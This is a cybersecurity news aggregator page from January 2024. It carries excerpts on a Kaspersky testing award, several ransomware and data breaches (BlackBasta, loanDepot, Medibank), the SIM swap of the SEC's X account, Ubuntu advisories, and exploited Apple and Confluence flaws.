Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Kaspersky Standard w ...

 News

Great news! The latest generation of our security solutions for home users has received a Product of the Year 2023 award. Its the result of extensive multi-stage testing conducted by independent European test lab AV-Comparatives over the course of 2023, which examined and evaluated 16 security solutions from popular   show more ...

vendors. Heres what this victory means, what it consists of, how the testing was done, and what other awards we picked up. Our Kaspersky Standard security solution was named Product of the Year 2023 after in-depth testing by AV-Comparatives What does Product of the Year actually mean? The tests were carried out on our basic security solution for home users — Kaspersky Standard — but its outstanding results apply equally to all our endpoint products. The reason is simple: all our solutions use the same detection and protection technologies stack that was thoroughly tested by AV-Comparatives. Thus, this top award, Product of the Year 2023, applies equally to our more advanced home protection solutions — Kaspersky Plus and Kaspersky Premium — and also our business products, such as Kaspersky Endpoint Security for Business and Kaspersky Small Office Security. So what does it take to earn the coveted Product of the Year title? A security solution needs to take part in seven tests throughout the year and consistently achieve the highest Advanced+ score in each of them. These tests examine the quality of protection against common threats and targeted attacks, resistance to false positives, and the impact on overall system performance. This golden triad of metrics forms the basis of a comprehensive evaluation of security solution performance. That the testing is continuous over the course of a year is important since malware developers hardly sit around twiddling their thumbs — new threats emerge all the time, and existing ones evolve with breathtaking speed. Consequently, security solution developers must keep moving forward at the same pace. Thats why assessing performance at a single point in time is misleading — to get a true picture of a solutions effectiveness requires extensive and repeated testing all year long. Which is precisely what AV-Comparatives does. AV-Comparatives examined 16 security solutions from the largest vendors in its tests. Winning such a significant contest clearly demonstrates the highest level of protection provided by our products. The seven rounds of tests — some of which individually lasted several months — that our protection took part in to eventually win the Product of the Year award were the following: March 2023: Malware Protection Test spring series April 2023: Performance Test spring series February–May 2023: Real-World Protection Test first series September 2023: Malware Protection Test autumn series September–October 2023: Advanced Threat Protection Test October 2023: Performance Test autumn series July–October 2023: Real-World Protection Test second series To earn AV-Comparatives Product of the Year title, a security solution needs to get the highest score in each stage of testing. And our product rose to the challenge: in each of the tests listed above, Kaspersky Standard scooped the top score — Advanced+. The Product of the Year award went to Kaspersky Standard based on top marks in all seven of a series of AV-Comparatives tests in 2023 How AV-Comparatives tests security solutions Now for a closer look at AV-Comparatives testing methodology. The different tests evaluate the different capabilities of the security solutions taking part. Malware Protection Test This test examines the solutions ability to detect prevalent malware. In the first phase of the test, malicious files (AV-Comparatives uses just over 10,000 malware samples) are written to the drive of the test computer, after which theyre scanned by the tested security solution — at first offline, without internet access, and then online. Any malicious files that were missed by the protective solution during static scanning are then run. If the product fails to prevent or reverse all the malwares actions within a certain time, the threat is considered to have been missed. Based on the number of threats missed, AV-Comparatives assigns a protection score to the solution. Also during this test, the security solutions are evaluated for false positives. High-quality protection shouldnt mistakenly flag clean applications or safe activities. After all, if one cries wolf too often, the user will begin to ignore the warnings, and sooner or later malware will strike. Not to mention that false alarms are extremely annoying. The final score is based on these two metrics. An Advanced+ score means reliable protection with a minimum of false positives. Real-World Protection Test This test focuses on protection against the most current web-hosted threats at the time of testing. Malware (both malicious files and web exploits) is out there on the internet, and the solutions being tested can deploy their whole arsenals of built-in security technologies to detect the threats. Detection and blocking of a threat with subsequent rollback of all changes can occur at any stage: when opening a dangerous link, when downloading and saving a malicious file, or when the malware is already running. In any of these cases, the solution is marked a success. As before, both the number of missed threats and also the number of false positives are taken into account for the final score. Advanced+ is awarded to products that minimize both these metrics. Advanced Threat Protection Test This test assesses the ability of the solution to withstand targeted attacks. To this end, AV-Comparatives designs and launches 15 attacks to simulate real-world ones, using diverse tools, tactics and techniques, with various initial conditions and along different vectors. A test for false positives is also carried out. This checks whether the solution blocks any potentially risky, but not necessarily dangerous, activity (such as opening email attachments), which increases the level of protection at the expense of user convenience and productivity. Performance Test Another critical aspect of a security solutions evaluation is its impact on system performance. Here, the lab engineers emulate a number of typical user scenarios to evaluate how the solution under test affects their run time. The list of scenarios includes: Copying and recopying files Archiving and unpacking files Installing and uninstalling programs Starting and restarting programs Downloading files from the internet Web browsing Additionally, system-performance drops are measured against the PCMark 10 benchmark. Based on these measurements, AV-Comparatives calculates the total impact of each solution on system performance (the lower this metric, the better), then applies a statistical model to assign a final score to the products: Advanced+, Advanced, Standard, Tested, Not passed. Naturally, Advanced+ means minimal impact on computer performance. What other AV-Comparatives awards did Kaspersky pick up in 2023? Besides Kaspersky Standard being named Product of the Year, our products received several other important awards based on AV-Comparatives tests in 2023: Real World Protection 2023 Silver Malware Protection 2023 Silver Advanced Threat Protection Consumer 2023 Silver Best Overall Speed 2023 Bronze Lowest False Positives 2023 Bronze Certified Advanced Threat Protection 2023 Strategic Leader 2023 for Endpoint Prevention and Response Test 2023 Approved Enterprise Business Security 2023 We have a long-standing commitment to using independent research by recognized test labs to impartially assess the quality of our solutions and address identified weaknesses when upgrading our technologies. For 20 years now, the independent test lab AV-Comparatives has been putting our solutions through their paces, confirming time and again our quality of protection and conferring a multitude of awards. Throughout the whole two decades, weve received the highest Product of the Year award seven times; no other vendor of security solutions has had such a number of victories. And if we add to this all the Outstanding Product and Top Rated awards weve also received over the years, it turns out that Kaspersky security solutions have received top recognitions from AV-Comparatives experts a full 16 times in 20 years! Besides this, AV-Comparatives has also awarded us: 57 Gold, Silver, and Bronze awards in a variety of specialized tests Two consecutive Strategic Leader awards in 2022 and 2023, for high results in protection against targeted attacks by the Kaspersky EDR Expert solution Confirmation of 100% anti-tampering protection (Anti-Tampering Test 2023) Confirmation of 100% protection against LSASS attacks (LSASS Credential Dumping Test 2022) Confirmation of top-quality Network Array Storage protection (Test of AV solution for Storage) and numerous other awards Learn more about the awards weve received, and check out our performance dynamics in independent tests from year to year by visiting our TOP 3 Metrics page.

image for BlackBasta Ransomwar ...

 Firewall Daily

The BlackBasta ransomware group has claimed two new victims, Southern Water and Asahi Glass Co., adding them to their dark web portal. The cybercriminals, however, have not disclosed details about the extent of the attack, compromised data, or the motive behind the intrusion. What adds to the urgency is the ransomware   show more ...

group’s ominous deadline for data exposure. Southern Water faces a countdown of 6 days, 18 hours, 43 minutes, and 50 seconds, while Asahi Glass Co. has a ticking clock set for 7 days, 20 hours, 39 minutes, and 54 seconds. This ominous timeframe raises serious concerns about potential data breaches and the urgency for a response. Source: Twitter Upon checking the official websites of the targeted companies, they were found to be fully functional, casting doubt on the authenticity of the ransomware group’s claims. Source: Twitter To verify this, The Cyber Express team reached out to Southern Water and Asahi Glass Co. for official statements. As of writing this report, no official response has been received, leaving the claim unverified and raising serious concerns. Recurrence of BlackBasta Ransomware Attack This recent incident follows BlackBasta’s pattern of targeting major entities. In January 2024, the ransomware group expanded its dark web portfolio, adding three more victims to its list of cyberattacks—Graebener Bipolar Plate Technologies in Germany, NALS Apartment Homes, and Leonard’s Express in the United States. Notably, BlackBasta garnered attention in May 2023 when it targeted Viking Coca-Cola, one of the largest Coca-Cola bottling partners in the United States. The ransomware attack led to the illicit acquisition of sensitive information, including passports, confidential details, credit card information, and employee records. In March of the same year, Tri Counties Bank, based in Chico, California, found itself on the list of victims. The BlackBasta ransomware group exposed personal information, including U.S. passports and driver’s licenses, belonging to the bank’s customers. As The Cyber Express closely monitors this unfolding story, we are committed to providing regular updates on any developments related to the companies targeted by the BlackBasta ransomware group. Stay tuned for the latest information on this evolving cyber threat. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Data from Indian Onl ...

 Cybersecurity News

Teenpatti.com and (Mobile Premier League)Mpl.live, two prominent online gaming platforms in India, may have experienced a data breach. Allegedly, a cybercriminal known as ‘roshtosh’ has put up for sale data claimed to be stolen from these platforms. The online gaming data breach, disclosed on January 22,   show more ...

2024, following the threat activity on January 20, 2024, has raised serious concerns about the security of user information on online gaming sites. Details of the Online Gaming Data Breach The threat actor, identified as ‘roshtosh’, announced the breach on the nuovo BreachForums. According to the perpetrator’s claims, the databases of teenpatti.com and mpl.live contained 400,000 and 508,000 records, respectively. These records exposed in the online gaming data breach, reportedly include highly sensitive personally identifiable information (PII) like names, email addresses, phone numbers, and physical addresses of the platforms’ users. (Source: Dark Web) The attack’s impact extends across India and resonates throughout the Asia-Pacific region, underlining the growing threat of cyberattacks in this area. Online Gaming Data Breach: Implications and the Way Forward While the alleged data breach at Teenpatti.com and Mpl.live remains unconfirmed, the team at The Cyber Express has initiated contact with these firms for confirmation and additional information regarding the incident. ALSO READ | Grand Theft Auto 6 Leaked by Uber Hacker This situation, involving two prominent online gaming platforms, highlights the pressing need for security measures within the digital domain, especially in sectors like gaming that manage large volumes of personal user data. There is a critical need for enhanced security protocols and vigilant monitoring to safeguard user data against such malicious activities. In light of the reported data breach concerning Teenpatti.com and Mpl.live, it’s crucial for users of these online gaming platforms to exercise increased caution and vigilance. Online Gaming Cyberattacks: A Worrying Trend The gaming industry has experienced a significant rise in cyberattacks, with over 4 million attacks targeting gamers between July 2022 and July 2023. These attacks predominantly affected the mobile gaming community, which comprises a substantial portion of the global gaming population. The attacks were diverse in nature, with popular games like Minecraft, and Roblox being employed as bait. For instance, Minecraft players in Indonesia were targeted by a Trojan.AndroidOS.Pootel.a attack, while Roblox users on Android faced threats from SpyNote, a spy Trojan with extensive spying capabilities, including keylogging and screen recording. Phishing and counterfeit distribution pages have also posed significant threats to gamers. These malicious pages often masquerade as popular games and are distributed through third-party websites offering pirated versions, leading to harmful or unrelated content being downloaded by unsuspecting users. In addition to these targeted attacks, the gaming industry has also been affected by sophisticated ransomware groups like BlackCat, known for their double extortion attacks. This group has been particularly active, leveraging various methods to infiltrate networks, including exploiting known vulnerabilities and social engineering. The ransomware-as-a-service (RaaS) model, as used by BlackCat, allows these groups to scale their operations significantly. Another concerning trend is the rise of double extortion and encryption-less ransomware attacks, where data is exfiltrated and threatened to be published if ransoms are not paid. The impact of these attacks on users is multifold. In addition to the immediate threat of personal data exposure and financial loss, there’s a long-term erosion of trust in the gaming platforms. The attacks highlight the critical need for robust cybersecurity measures within the gaming community to protect against such sophisticated threats. Gamers are advised to download games only from official stores and be cautious of phishing campaigns and unfamiliar sources. Employing strong, reliable security solutions and staying updated on the latest cybersecurity practices are essential steps in safeguarding against these threats​​​​. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Episode 255: EDM, Me ...

 CISA

In this episode of The Security Ledger Podcast (#255) host Paul Roberts interviews Niels Provos of Lacework about his mission to use EDM to teach people about cybersecurity. The post Episode 255: EDM, Meet CDM – Cyber Dance Music with Niels Provos appeared first on The Security Ledger with Paul F. Roberts. Click   show more ...

the icon below to listen. Related StoriesCiting Attacks On Small Utilities, Dragos Launches Community Defense ProgramFBI: Iranian APT Targets Israeli-Made PLCs Used In Critical IndustriesBitCoins To Bombs: North Korea Funds Military With Billions In Stolen Cryptocurrency

 Malware and Vulnerabilities

The infection chain begins with deceptive emails and websites, ultimately leading to the activation of the Chae$ 4.1 malware, highlighting the importance of cautious online behavior.

 Incident Response, Learnings

Australia has used its significant cyber incidents sanctions regime for the first time against a Russian individual named Aleksandr Gennadievich Ermakov, who is linked to the 2022 cyber attack on health insurer Medibank Private.

 Malware and Vulnerabilities

Malicious Python packages on PyPI, such as nigpal, figflix, and seGMM, have been identified, with payloads designed to steal sensitive information from victims' devices, particularly targeting Windows users.

 Trends, Reports, Analysis

Bulletproof hosting (BPH) providers operate in a complex and persistent manner, making it challenging for defenders to permanently shut them down. Blocking BPH providers can effectively disrupt malicious activities early in the kill chain.

 Govt., Critical Infrastructure

The Securities and Exchange Commission (SEC) experienced an account takeover on Twitter due to a SIM swap attack, where the unauthorized party gained control of the SEC's cell phone number.

 Malware and Vulnerabilities

The BianLian ransomware group has shifted from a double extortion scheme to a focus on extortion without encryption, posing a significant threat to organizations, particularly in the healthcare and manufacturing sectors in the US and Europe.

 Feed

Ubuntu Security Notice 6595-1 - It was discovered that PyCryptodome had a timing side-channel when performing OAEP decryption. A remote attacker could possibly use this issue to recover sensitive information.

 Feed

Ubuntu Security Notice 6594-1 - Joshua Rogers discovered that Squid incorrectly handled HTTP message processing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled Helper process management. A remote   show more ...

attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service. Joshua Rogers discovered that Squid incorrectly handled HTTP request parsing. A remote attacker could possibly use this issue to cause Squid to crash, resulting in a denial of service.

 Feed

Ubuntu Security Notice 6593-1 - It was discovered that GnuTLS had a timing side-channel when processing malformed ciphertexts in RSA-PSK ClientKeyExchange. A remote attacker could possibly use this issue to recover sensitive information. It was discovered that GnuTLS incorrectly handled certain certificate chains with   show more ...

a cross-signing loop. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 23.04, and Ubuntu 23.10.

 Feed

Ubuntu Security Notice 6592-1 - It was discovered that libssh incorrectly handled the ProxyCommand and the ProxyJump features. A remote attacker could possibly use this issue to inject malicious code into the command of the features mentioned through the hostname parameter. It was discovered that libssh incorrectly   show more ...

handled return codes when performing message digest operations. A remote attacker could possibly use this issue to cause libssh to crash, obtain sensitive information, or execute arbitrary code.

 Feed

Logwatch analyzes and reports on unix system logs. It is a customizable and pluggable log monitoring system which will go through the logs for a given period of time and make a customizable report. It should work right out of the package on most systems.

 Firewall Daily

The U.S. Securities and Exchange Commission (SEC) has officially confirmed a cyberattack on its X account, revealing that the breach was a result of a SIM-swapping attack on the cell phone number associated with the account. The incident of the SEC X account hacked, which occurred on January 9, 2024, initially   show more ...

involved the dissemination of a false announcement suggesting the SEC’s approval of spot bitcoin Exchange-Traded Funds (ETFs), causing widespread misinformation. SIM-Swap Attack Behind SEC X Account Hack More than 10 days after the breach, the SEC has released an official statement detailing the nature of the attack. The unauthorized party gained control of the SEC cell phone number associated with the SEC X account through a SIM swap attack, a technique used to transfer a person’s phone number to another device without authorization. The SEC clarified that the access to the phone number occurred via the telecom carrier, not through SEC systems. There is no evidence to suggest that the unauthorized party gained access to SEC systems, data, devices, or other social media accounts, according to SEC staff. “SEC staff have not identified any evidence that the unauthorized party gained access to SEC systems, data, devices, or other social media accounts,” reads the SEC official Statement. The SEC is actively coordinating with law enforcement and federal oversight entities, including the SEC’s Office of Inspector General, the Federal Bureau of Investigation, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, the Commodity Futures Trading Commission, the Department of Justice, and the SEC’s own Division of Enforcement. Upon gaining control of the phone number, the unauthorized party reset the password for the @SECGov account. Law enforcement is currently investigating how the party convinced the carrier to change the SIM for the account and how they knew the phone number associated with the account. Role of Multi-Factor Authentication (MFA) Notably, multi-factor authentication (MFA) had been enabled on the @SECGov X account in the past but was disabled by X Support in July 2023 at the staff’s request due to account access issues. MFA remained disabled until it was reenabled after the account was compromised on January 9. MFA is currently enabled for all SEC social media accounts that offer it. While the previously enabled MFA through SMS would not have been effective in preventing the breach, as attackers could have obtained the one-time passcodes, configuring MFA to utilize an authentication app could have served as a more enhanced defense. In such a scenario, the use of an authentication app would have hindered threat actors from accessing the account even after they successfully changed the password. This incident marks the latest in a series of cyberattacks on X accounts, with three major X accounts being hacked within a week, highlighting the persistent threat landscape. The SEC continues to address these challenges, reinforcing the need for enhanced cybersecurity measures and urging the broader adoption of MFA for a more resilient defense against cyber threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Cybersecurity News

Australia has taken a historic step by publicly revealing and imposing cyber sanctions on a Russian hacker implicated in the 2022 ransomware attack on Medibank. This marks the first instance of Australia utilizing such penalties. The cyber intrusion targeted Medibank, one of Australia’s largest private health   show more ...

insurers, compromising personal data from 9.7 million customers, including names, birthdates, medical information, and Medicare numbers. Disturbingly, some of this information was subsequently disclosed on the dark web, as confirmed by Australian authorities. After an exhaustive 18-month investigation, the Australian government disclosed the sanctioned individual as Aleksandr Ermakov, a 33-year-old Russian national allegedly affiliated with the ransomware gang REvil. Criminal Offense, Cyber Sanctions and Travel Ban The sanctions criminalize the provision of assets to Ermakov, as well as the use or handling of his assets, including cryptocurrency wallets or ransom payments. According to the release, the offense carries a potential penalty of up to 10 years’ imprisonment, coupled with a travel ban on Ermakov. Richard Marles, Deputy Prime Minister and Defense Minister, commended the government’s relentless efforts to unveil the perpetrators of the Medibank cyberattack. The investigation involved collaborative efforts from various agencies, including the Australian Signals Directorate, Australian Federal Police, FBI, NSA in the United States, and GCHQ in the United Kingdom. Private sector cooperation, notably from Microsoft and Medibank, played a crucial role in the investigative process. “The Australian Signals Directorate and the Australian Federal Police have worked tirelessly over the past 18 months to unmask those responsible for the cyberattack on Medibank Private and to ensure Australians are protected from malicious cyber activity,” said Deputy Prime Minister, the Hon Richard Marles MP. Alleged Connection to REvil and Global Impact The cyberattack on Medibank, initially associated with the REvil group by cybersecurity experts, triggered global cooperation in response. REvil, known for its large-scale attacks, had previously targeted entities in the United States, with a notable incident involving the international meat supplier JBS Foods in 2021. Abigail Bradshaw, Head of the Australian Cybersecurity Center, acknowledged the dynamic nature of Russian cyber-criminal syndicates like REvil. While the disruption of REvil doesn’t halt its operations, publicly disclosing Ermakov’s identity is expected to hinder his activities and serve as a financial setback for the imposed sanctions. Deputy Prime Minister Marles highlighted the substantial impact of revealing Ermakov’s identity, making it visible to global agencies and anyone considering engagement with him. Investigations into other individuals connected to the cyberattack are ongoing. The ramifications of the Medibank breach extended beyond Australia, affecting 1.8 million international customers. The initial ransom demand was set at US$10 million (15 million Australian dollars), later reduced to US$9.7 million, a sum that Medibank refused to pay. Government’s Firm Stance Against Ransom Payments Minister for Home Affairs and Minister for Cybersecurity, Clare O’Neil MP, condemned malicious cyber activity, emphasizing the government’s commitment to working with partners to punish individuals attempting cybercrime in the country. The announcement aligns with the 2023-2030 Australian Cybersecurity Strategy, focusing on strengthening defenses, collaborating with industry, and breaking the ransomware business model. “The Australian Government condemns malicious cyber activity, and we will work with our partners and do everything in our power to punish individuals who attempt to perpetrate cybercrime in this country,” said Minister O’Neil. “Our strong advice to businesses is never to pay the ransom. Paying a ransom does not guarantee sensitive data will be recovered, prevent it from being sold or leaked online or prevent further attacks. It also makes Australia a more attractive target for criminal groups.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Data Breach News

LoanDepot, Inc., a leading provider of home lending solutions, has informed its customers that an unauthorized third party accessed sensitive personal information from approximately 16.6 million individuals within its systems through a loanDepot cyberattack. The loanDepot Cyberattack has prompted the company to take   show more ...

swift action, including notifying affected individuals and offering credit monitoring and identity protection services at no cost to them. While the investigation is ongoing, loanDepot has been working tirelessly with external forensics and security experts to understand the extent of the breach and restore normal operations. Company Leadership Addresses loanDepot Cyberattack CEO Frank Martell expressed regret over the incident, acknowledging the increasingly frequent and sophisticated nature of cyberattacks in today’s world. “Unfortunately, we live in a world where these types of attacks are increasingly frequent and sophisticated, and our industry has not been spared. We sincerely regret any impact to our customers,” said loanDepot CEO Frank Martell in a media statement released by the officials. He emphasized the company’s dedication to resolving the situation and supporting customers throughout the process. loanDepot has made substantial progress in restoring its loan origination and loan servicing systems, including the MyloanDepot and Servicing customer portals. Martell further stated, “The entire loanDepot team has worked tirelessly throughout this incident to support our customers, our partners, and each other. I am pleased by our progress in quickly bringing our systems back online and restoring normal business operations.” Jeff Walsh, President of LDI Mortgage, echoed Martell’s sentiments, highlighting the team’s dedication to customers and expressing pride in overcoming the challenges. He emphasized the company’s commitment to enabling customers nationwide to achieve their financial goals and dreams of homeownership. “Our customers are at the center of everything we do,” said Jeff Walsh, President of LDI Mortgage. “I’m really proud of our team, and we’re glad to be back to doing what we do best: enabling our customers across the country to achieve their financial goals and dreams of homeownership,” he added further. loanDepot has set up a microsite at loandepot.cyberincidentupdate.com to keep customers, partners, and employees informed, providing additional operational updates as the situation evolves. Industry Trends and Similar Incidents The company, on January 8, had issued a statement publicly acknowledging the cyberattack and taking specific systems offline to address the situation promptly. It took 10 days for loanDepot to bring back crucial portals, including the Servicing customer portal, HELOC customer portal, MyloanDepot customer portal, and mellohome’s website, albeit with some functionality limitations. The recent cyberattack on loanDepot follows similar incidents in the mortgage industry. Fidelity National Financial (FNF) disclosed in an 8K filing with the Securities and Exchange Commission (SEC) that 1.3 million customers had their data exposed in a cyberattack on January 8. In a separate incident, Mr. Cooper, another major mortgage provider, reported a cyberattack affecting nearly 14 million individuals. As the industry grapples with an increasing number of cyber threats, loanDepot remains committed to securing its systems and mitigating the impact on its customers. The ongoing investigations and collaborative efforts with cybersecurity experts aim to strengthen the company’s defenses against future cyber threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Feed

Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild. The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem

 Feed

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible

 Feed

Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed. The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm

 Feed

Cracked software have been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and

 Feed

As we enter 2024, Gcore has released its latest Gcore Radar report, a twice-annual publication in which the company releases internal analytics to track DDoS attacks. Gcore’s broad, internationally distributed network of scrubbing centers allows them to follow attack trends over time. Read on to learn about DDoS attack trends for Q3–Q4 of 2023, and what they mean for developing a robust

 Feed

Conor Brian Fitzpatrick has been sentenced to time served and 20 years of supervised release for his role as the creator and administrator of BreachForums. Fitzpatrick, who went by the online alias "pompompurin," was arrested in March 2023 in New York and was subsequently charged with conspiracy to commit access device fraud and possession of child pornography. He was later released on a $

 Feed

The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal. The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said,

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Lawrence Abrams The U.S. Securities and Exchange Commission confirmed today that its X account was hacked through a SIM-swapping attack on the cell phone number associated with the account. Earlier this month, the SEC’s X account was hacked to issue a fake   show more ...

announcement that the agency had finally approved Bitcoin ETFs on security […] La entrada SEC confirms X account was hacked in SIM swapping attack – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Apple

Source: www.bleepingcomputer.com – Author: Bill Toulas Hackers are using a stealthy method to deliver to macOS users information-stealing malware through DNS records that hide malicious scripts. The campaign appears directed at users of macOS Ventura and later and relies on cracked applications repackaged as   show more ...

PKG files that include a trojan. Attack details Researchers at cybersecurity company […] La entrada Cracked macOS apps drain wallets using scripts fetched from DNS records – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Today, the U.S. Federal Trade Commission (FTC) ordered Intuit to stop promoting its software products and services as “free” unless they’re actually free for all consumers. The order comes after the consumer protection watchdog’s   show more ...

investigation into how Intuit promoted its tax preparation software TurboTax as being a “free” product […] La entrada FTC orders Intuit to stop pushing “free” software that isn’t really free – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas Security researchers looking at more than 10,000 scripts used by the Parrot traffic direction system (TDS) noticed an evolution marked by optimizations that make malicious code stealthier against security mechanisms. Parrot TDS was discovered by   show more ...

cybersecurity company Avast in April 2022 and it is believed to have been active since […] La entrada Malicious web redirect scripts stealth up to hide on hacked sites – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Apple

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Apple released security updates to address this year’s first zero-day vulnerability exploited in attacks that could impact iPhones, Macs, and Apple TVs. The zero-day fixed today is tracked as CVE-2024-23222 [iOS, macOS, tvOS] and is a WebKit   show more ...

confusion issue that attackers could exploit to gain code execution on targeted […] La entrada Apple fixes first zero-day bug exploited in attacks this year – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Ivanti warned admins to stop pushing new device configurations to appliances after applying mitigations because this will leave them vulnerable to ongoing attacks exploiting two zero-day vulnerabilities. While the company didn’t provide additional   show more ...

details, it said that this is caused by a known race condition when pushing configurations that […] La entrada Ivanti: VPN appliances vulnerable if pushing configs after mitigation – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Mortgage lender loanDepot says that approximately 16.6 million people had their personal information stolen in a ransomware attack disclosed earlier this month. Following a January 6 attack that forced it to shut down some of its systems to contain the   show more ...

breach, the company told customers that recurring automatic payments […] La entrada loanDepot cyberattack causes data breach for 16.6 million people – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas Trezor issued a security alert after identifying a data breach that occurred on January 17 due to unauthorized access to their third-party support ticketing portal. The popular hardware cryptocurrency wallet vendor says that the investigation on the   show more ...

incident is ongoing but it found no evidence so far that users’ digital assets were […] La entrada Trezor support site breach exposes personal data of 66,000 customers – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas Security researchers are observing exploitation attempts for the CVE-2023-22527 remote code execution flaw vulnerability that affects outdated versions of Atlassian Confluence servers. Atlassian disclosed the security issue last week and noted that it   show more ...

impacts only Confluence versions released before December 5, 2023, along with some out-of-support releases. The flaw has a critical severity […] La entrada Hackers start exploiting critical Atlassian Confluence RCE flaw – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Blog

Source: socprime.com – Author: Veronika Telychko Just slightly over a week after the UAC-0050 group’s attack against Ukraine leveraging Remcos RAT, Quasar RAT, and Remote Utilities, adversaries reemerge in the cyber threat arena. CERT-UA has recently notified defenders of the ongoing group’s campaign   show more ...

involving mass email distribution and masquerading the senders as State Service of […] La entrada UAC-0050 Activity Detection: Hackers Impersonate SSSCIP and State Emergency Service of Ukraine Using Remote Utilities – Source: socprime.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: Ryan Naraine Apple pushes out fresh versions of its iOS and macOS platforms to fix WebKit vulnerabilities being exploited as zero-day in the wild. The post Apple Ships iOS 17.3, Warns of WebKit Zero-Day Exploitation appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/apple-ships-ios-17-3-warns-of-webkit-zero-day-exploitation/ Category & Tags: Malware & Threats,Vulnerabilities,iOS 17.3,macOS Sonoma,WebKit,Zero-Day […] La entrada Apple Ships iOS 17.3, Warns of WebKit Zero-Day Exploitation – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 artificial inteligence

Source: www.securityweek.com – Author: Ryan Naraine SecurityWeek interviews a wide spectrum of security experts on AI-driven cybersecurity use-cases that are worth immediate attention. The post Security Experts Describe AI Technologies They Want to See appeared first on SecurityWeek. Original Post URL:   show more ...

https://www.securityweek.com/security-experts-describe-ai-technologies-they-want-to-see/ Category & Tags: Artificial Intelligence,Management & Strategy,artificial inteligence,ChatGPT,LLMs,venture capital – Artificial Intelligence,Management & […] La entrada Security Experts Describe AI Technologies They Want to See – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 atlassian

Source: www.securityweek.com – Author: Eduard Kovacs The Atlassian Confluence vulnerability CVE-2023-22527 is being exploited in the wild just days after it was disclosed.  The post Hackers Targeting Critical Atlassian Confluence Vulnerability Days After Disclosure appeared first on SecurityWeek. Original Post   show more ...

URL: https://www.securityweek.com/hackers-start-targeting-critical-atlassian-confluence-vulnerability-days-after-disclosure/ Category & Tags: Vulnerabilities,Atlassian,Confluence,exploited,Featured,vulnerability – Vulnerabilities,Atlassian,Confluence,exploited,Featured,vulnerability La entrada Hackers Targeting Critical Atlassian Confluence Vulnerability Days After Disclosure – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.securityweek.com – Author: SecurityWeek News Lending giant LoanDepot (NYSE: LDI) said that roughly 16.6 million individuals were impacted as a result of a ransomware attack. The post LoanDepot Breach: 16.6 Million People Impacted appeared first on SecurityWeek. Original Post URL: https://www.   show more ...

